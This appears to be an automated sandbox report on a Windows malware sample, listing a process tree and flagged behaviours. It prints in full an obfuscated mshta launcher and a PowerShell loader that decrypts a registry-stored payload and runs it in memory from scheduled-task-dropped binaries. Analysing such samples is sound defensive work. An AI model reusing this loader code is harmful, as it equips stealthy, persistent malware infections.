msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 6988 attrib.exe 4968 attrib.exe 4360 attrib.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{982b105d-4ff0-4db4-a092-125e0fff31ae}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{45e7c5c1-0501-463d-b264-506e3109e924}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1a775a46-a247-49d4-9ba2-7f91c8e9fc08}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{661e236f-9f3e-4c55-acc3-6cb777eba59f}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{258100b7-590c-45e1-9f1b-05a1c6485a55}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{78f4b273-37ea-41f2-86d0-e83ef596b666}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6604 -s 4083⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{956d5857-ba7a-4a6a-8372-f0d36493aae1}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7008 -s 4123⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{41fc4822-883b-4647-a525-3bfa5b979065}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6108 -s 3243⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{291a6aad-4c19-4509-aa22-215d2fedec93}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{6bb535ad-cefe-4bc5-9c63-23542c75d01f}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d5cc7e19-4999-4667-afc2-4b66c3b01c83}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1608d58a-4a0a-4640-9fba-0cd4fc83ea65}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{8e6a81c5-4614-42f6-aac5-cef00bfb1d4d}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{643f90f6-a869-4348-9d8b-aa97d0cf3f53}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{02a52147-4897-4812-a6c0-a21132193c94}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3db540ea-bb6a-4512-bfe8-1a68b03fc925}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%3⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{3e25bd7b-f7ba-4452-96bd-65a74d0e4b4e}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4976).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{769ae426-e739-4682-89d1-b39388590f22}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{fcf5b0f2-260d-440c-bc0c-8cf94d5e9152}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{890b9a93-eaaa-4a90-ba4d-03b09e9dc71e}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{ec89e5f2-e9ae-4cac-9b30-d226b04a1d55}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{8a92fddd-246d-4ab0-bb2d-cb03931777f0}5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 4686⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{5864ce94-f02e-4fec-97a5-4ee963750108}5⤵
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%3⤵
-
